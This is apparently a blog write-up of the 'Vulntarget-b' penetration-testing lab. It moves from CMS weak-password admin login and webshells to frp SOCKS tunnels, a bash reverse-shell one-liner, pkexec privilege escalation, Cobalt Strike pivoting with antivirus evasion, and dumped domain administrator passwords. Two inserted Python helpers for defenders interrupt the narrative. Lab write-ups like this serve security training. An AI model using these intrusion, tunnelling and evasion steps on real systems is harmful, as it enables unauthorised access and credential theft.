Vulntarget-b

0 Information gathering

I just came across the scaninfo tool and gave it a try; the results were decent.

{"ip":"192.168.1.114","port":21,"service":"ftp","Banner":"220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x0d\\x0a220-You are user number 1 of 50 allowed.\\x0d\\x0a220-Local time is now 14:48. Server port: 21.\\x0d\\x0a220-This is a private system - No anonymous login\\x0d\\x0a220-IPv6 connections are also welcome on this server.\\x0d\\x0a220 You will be disconnected after 15 minutes of inactivity.\\x0d\\x0a500 HTTP command: [get]\\x0d\\x0a","url":""}
{"ip":"192.168.1.114","port":22,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"192.168.1.114","port":110,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":25,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":80,"service":"http","Banner":"","url":"http://192.168.1.114:80"}
{"ip":"192.168.1.114","port":81,"service":"http","Banner":"","url":"http://192.168.1.114:81"}
{"ip":"192.168.1.114","port":8888,"service":"http","Banner":"","url":"http://192.168.1.114:8888"}
{"url":"http://192.168.1.114:80","StatusCode":200,"Title":"没有找到站点","HeaderDigest":"server:nginx","Length":1326,"KeywordFinger":"宝塔-BT.cn","HashFinger":""}
{"url":"http://192.168.1.114:81","StatusCode":200,"Title":"极致CMS建站系统","HeaderDigest":"server:nginx","Length":14398,"KeywordFinger":"","HashFinger":""}
{"url":"http://192.168.1.114:8888","StatusCode":200,"Title":"安全入口校验失败","HeaderDigest":"server:nginx","Length":802,"KeywordFinger":"宝塔-BT.cn","HashFinger":"宝塔-BT.cn"}

There are two open web services: the Baota (宝塔, BT.cn) panel on port 8888 and the 极致CMS (JiZhiCMS) site builder on port 81.

Baota is a bit of a pain, so let's look at 极致CMS first.

1 Initial foothold

Ran a directory scan; almost everything came back 403, and only readme.txt and admin.php were useful.

readme.txt contains the version, 极致CMS Beta1.8.1, and admin.php is the admin login entry. Searched for vulnerabilities and found this article on 先知 (Xianzhi); tried quite a few weak passwords and finally got in with admin/admin123. After that, just follow the steps in the article.

Connected with AntSword (蚁剑); running commands returned ret=127, so disable_functions had to be bypassed, which I did directly with the plugin.

2 Internal network reconnaissance

The current host's IP is 192.168.1.114; tried to look at the subnet... no response.

Uploaded a different large webshell (大马); executing commands through it reported "command not found".

Changed approach and read /proc/net/arp instead.

小小火 said the binaries under /sbin/* can be run by full path, since /sbin isn't in the PATH environment variable (the default is /usr/bin).

Found an internal subnet, 10.0.20.0/24, and a live host, 10.0.20.66 (from the ARP table).

Ran scaninfo against that single IP with host discovery disabled: ./scaninfo -np -i 10.0.20.66

{"ip":"10.0.20.66","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.20.66","port":8080,"service":"http","Banner":"","url":"http://10.0.20.66:8080"}
{"url":"http://10.0.20.66:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""}

3 Tunnelling into the internal network

Use frp for the tunnel.

On the public VPS, run frps with this frps.ini:

[common]
bind_addr = 0.0.0.0
bind_port = 7788

On the target machine, run frpc with this frpc.ini:

[common]
server_addr = x.x.x.x # VPS public IP
server_port = 7788
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5

Run ./frpc -c frpc.ini; the server side receives the connection.

4 Internal host 1

10.0.20.66:8080 is a ZenTao (禅道) project management system.

Visit http://10.0.20.66:8080/index.php?mode=getconfig to read the version information.

Click "log in with the demo account" to reach the backend, then use CNVD-C-2020-121325 to get a shell; this vulnerability, however, needs an administrator account.

A good buddy told me the credentials are admin/Admin123...

Started an HTTP server with python on 10.0.20.30: python -m SimpleHTTPServer 11881

Then just follow the exploitation steps.

The resulting user is low-privileged.

There is a domain, vulntarget.com, on the 10.0.10.0/24 subnet.

tasklist /svc shows Huorong (火绒) antivirus is running.

5 Setting up a second-level tunnel

Keep the first-level proxy up; don't let it drop.

Deployment order (server first, then client): egress-capable host (server) ---> internal host (client) ---> VPS (server) ---> egress-capable host (client)

VPS

[common]
bind_addr = 0.0.0.0
bind_port = 7799
allow_ports = 1000-2000

Egress-capable host (client)

[common]
server_addr = 47.102.44.211
server_port = 7799
[http_proxy]
type = tcp
local_ip = 10.0.20.30
local_port = 1080
remote_port = 1080

Egress-capable host (server)

[common]
bind_addr = 10.0.20.30
bind_port = 7799
allow_ports = 1000-2000

Internal host (client)

[common]
server_addr = 10.0.20.30
server_port = 7799
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5
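To make the four fragments above explicit as one chain, here is an added Python helper (my code, not frp's and not from the original post) that parses them with the standard configparser, checks that each frpc's server_addr:server_port has a matching frps and that every remote_port sits inside that server's allow_ports, and then walks the resulting listeners from the VPS down to the socks5 plugin; this is what an incident responder reconstructing a tunnel from recovered frp configs needs. The role labels in the dict keys are my assumption; the ini contents are the page's own.

```python
import configparser

# The four frp fragments from this section, embedded here as constructed input;
# the role labels (vps, egress, internal) are mine, not frp's.
FRAGMENTS = {
    "vps frps.ini": "[common]\nbind_addr = 0.0.0.0\nbind_port = 7799\nallow_ports = 1000-2000\n",
    "egress frpc.ini": ("[common]\nserver_addr = 47.102.44.211\nserver_port = 7799\n"
                        "[http_proxy]\ntype = tcp\nlocal_ip = 10.0.20.30\nlocal_port = 1080\nremote_port = 1080\n"),
    "egress frps.ini": "[common]\nbind_addr = 10.0.20.30\nbind_port = 7799\nallow_ports = 1000-2000\n",
    "internal frpc.ini": ("[common]\nserver_addr = 10.0.20.30\nserver_port = 7799\n"
                          "[http_proxy]\ntype = tcp\nremote_port = 1080\nplugin = socks5\n"),
}

def port_allowed(spec, port):
    """allow_ports is a comma-separated list of single ports and lo-hi ranges."""
    for part in spec.split(","):
        lo, _, hi = part.strip().partition("-")
        if int(lo) <= port <= int(hi or lo):
            return True
    return False

def chain_listeners(fragments):
    """Return (listeners, problems). listeners: every (addr, port, target) an frps
    will open for a client proxy; problems: proxies that no frps in the set accepts."""
    servers, clients = {}, []
    for name, text in fragments.items():
        cp = configparser.ConfigParser()
        cp.read_string(text)
        common = cp["common"]
        if "bind_port" in common:                       # frps: record bind address + allow_ports
            servers[(common["bind_addr"], int(common["bind_port"]))] = common.get("allow_ports", "1-65535")
            continue
        for sect in cp.sections():                      # frpc: one entry per proxy section
            if sect == "common":
                continue
            p = cp[sect]
            target = p.get("plugin") or f"tcp->{p.get('local_ip', '127.0.0.1')}:{p['local_port']}"
            clients.append((name, common["server_addr"], int(common["server_port"]), int(p["remote_port"]), target))
    listeners, problems = [], []
    for name, saddr, sport, rport, target in clients:
        key = next((k for k in servers if k[1] == sport and k[0] in ("0.0.0.0", saddr)), None)
        if key is None:
            problems.append(f"{name}: no frps bound at {saddr}:{sport}")
        elif not port_allowed(servers[key], rport):
            problems.append(f"{name}: remote_port {rport} outside allow_ports {servers[key]}")
        else:
            listeners.append((saddr, rport, target))
    return listeners, problems

def trace(listeners, addr, port):
    """Follow tcp-> hops from one listener until a plugin (the real endpoint) or a dead end."""
    lookup = {(a, p): t for a, p, t in listeners}
    path = [f"{addr}:{port}"]
    while lookup.get((addr, port), "").startswith("tcp->"):
        addr, port = lookup[(addr, port)][5:].rsplit(":", 1)
        port = int(port)
        path.append(f"{addr}:{port}")
    return path + [lookup.get((addr, port), "dead end")]
```

For the page's configs, trace(listeners, "47.102.44.211", 1080) resolves the VPS port to the egress host's 1080 and then to the socks5 plugin on the internal host, i.e. the two-hop SOCKS path the section builds.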

I originally wanted to upload a large webshell through the proxy, but it never worked, so I just kept going through the proxy.

6 Taking the domain controller, method 1

Uploaded scaninfo and ran a scan; it pulled the domain controller credentials straight away (scaninfo is great).

{"ip":"10.0.10.99","port":445,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.99","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.99","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00M\\x7f\\x81à\\x9c;Ø\\x01 þ\\x08>\\x00\\x89ÓÀ\\x0bÁ]µwV\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.99","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":8080,"service":"http","Banner":"","url":"http://10.0.10.99:8080"}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n   [->]WIN-UH20PRD3EAO\n   [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100    [+]DC VULNTARGET\\WIN-UH20PRD3EAO   Windows Server 2016 Datacenter 14393"}
{"url":"http://10.0.10.99:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""}
{"cve-2020-0796":"cve-2020-0796","host":"10.0.10.99","port":445,"result":"[+] 10.0.10.99 CVE-2020-0796 SmbGhost Vulnerable"}
{"smb":"smb","host":"10.0.10.99","password":"admin@123","username":"administrator"}
{"smb":"smb","host":"10.0.10.100","password":"Admin@123","username":"administrator"}

Then just RDP in through the proxy that was set up.
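Each scaninfo dump above is JSON lines in several record shapes (port/service, web fingerprint, check results, credential hits). Here is an added Python parser (my code, not scaninfo's) that turns such output into a per-host inventory plus a findings list ordered the way a defender reviewing the same output would triage it: weak credentials first, then confirmed vulnerable services, then informational records. The sample input is constructed in the page's record shape, and the key-based record-type heuristics are my assumption from the lines shown.

```python
import json
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample in the JSON-lines shape scaninfo prints on this page (not a real scan).
SAMPLE = r"""
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.99","port":8080,"service":"http","Banner":"","url":"http://10.0.10.99:8080"}
{"url":"http://10.0.10.99:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100    [+]DC VULNTARGET\\WIN-UH20PRD3EAO   Windows Server 2016 Datacenter 14393"}
{"cve-2020-0796":"cve-2020-0796","host":"10.0.10.99","port":445,"result":"[+] 10.0.10.99 CVE-2020-0796 SmbGhost Vulnerable"}
{"smb":"smb","host":"10.0.10.99","password":"example-secret","username":"administrator"}
not json at all
"""

def parse_scaninfo(text):
    """Group scaninfo JSON lines into a per-host inventory and a findings list.
    Credential hits are reported by host/user only; the secret itself is not copied out."""
    hosts = defaultdict(lambda: {"ports": {}, "web": {}, "notes": []})
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            findings.append(("unparsed", "-", line[:40]))   # keep a trace, never silently drop
            continue
        if "ip" in rec and "port" in rec:                 # port/service record
            hosts[rec["ip"]]["ports"][rec["port"]] = rec.get("service") or "unknown"
        elif "StatusCode" in rec:                         # web fingerprint record
            host = urlparse(rec["url"]).hostname
            hosts[host]["web"][rec["url"]] = rec.get("KeywordFinger") or rec.get("Title") or ""
        elif "password" in rec:                           # credential hit (weak/default password)
            findings.append(("credential", rec["host"], f"{rec.get('smb', 'svc')} user {rec['username']}"))
        elif "result" in rec:                             # vuln check, NetBIOS or findnet result
            if "[+]DC " in rec["result"]:
                hosts[rec["host"]]["notes"].append("domain controller")
            kind = "vuln" if "Vulnerable" in rec["result"] else "info"
            findings.append((kind, rec["host"], rec["result"].strip()))
    return dict(hosts), findings

def triage_order(findings):
    """Sort findings so credential exposures come first, then vulns, then the rest."""
    rank = {"credential": 0, "vuln": 1, "unparsed": 2, "info": 3}
    return sorted(findings, key=lambda f: (rank.get(f[0], 9), f[1]))
```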

7 Taking the domain controller, method 2

Because AntSword's shell is stateless and awkward to work with, I spawned a reverse shell from the egress-capable host: bash -i >& /dev/tcp/ip/port 0>&1

Checked the system version: cat /proc/version, cat /etc/redhat-release

Found several privilege-escalation CVEs, but they all threw an error when run (environment variable problem), so I had to look elsewhere; CS couldn't be used either, which left only msf.

Searched and found that msf has an automatic privesc suggester module; let's try it.

(In the middle of this, msf on the VPS couldn't load the suggester module, so I used frp plus a local Kali.)

Later it looked like a bug in the latest version? Switched back to the VPS and escalated successfully via pkexec.

Ran shell to drop into an interactive shell; there is a flag in the root directory.

Ran the CS payload (大马); it came online and commands executed normally.

Created a pivot listener, which acts as a relay.

Because 4.2 can't produce the pivot listener's payload, I used web delivery, downloaded it, extracted the shellcode, and then made it AV-evasive.

Spent ages trying to get it to check in with no luck; my guess is that a Linux session can't pivot.

Changed approach: let it reach out directly using goproxy (the first time it started fine but was unusable, the second time it worked).

Created a beacon that goes through the proxy.

Generated a stageless payload, made it AV-evasive, uploaded it, ran it, online!

Checked the installed patches: CVE-2021-1732 could be used for privesc, but Huorong killed it immediately. Skipped privesc for now and did some recon: on the 10.0.10.0 subnet there is only one other live host besides this one.

Scanned it with scaninfo; confirmed it is the domain controller.

{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00\\x96ë«W`<Ø\\x01 þ\\x08>\\x00+\\x011Ø\\x14lÃ*V\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n   [->]WIN-UH20PRD3EAO\n   [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100    [+]DC VULNTARGET\\WIN-UH20PRD3EAO   Windows Server 2016 Datacenter 14393"}

Tested a bit: running the privesc script inside CS doesn't get it killed (confusing), but the script needs a "press any key to continue"; looked it up, and that can be satisfied with echo.

But that couldn't be used here, so I modified the source to remove the pause and had a friend compile it; running it got killed... Then I realised it hadn't been killed before only because no Enter was ever sent, so it never executed further.

Then I made the exp AV-evasive; still no luck. I'm numb at this point. This privesc has to rely on msf, which loads the exp straight into memory and runs it, with complete logic and no input required.

Shelved for now... vulntarget-b has to be done with msf; I don't have a way to do it with CS yet.

posted @ 2022-04-02 21:42  R3col  Views (522)  Comments (0)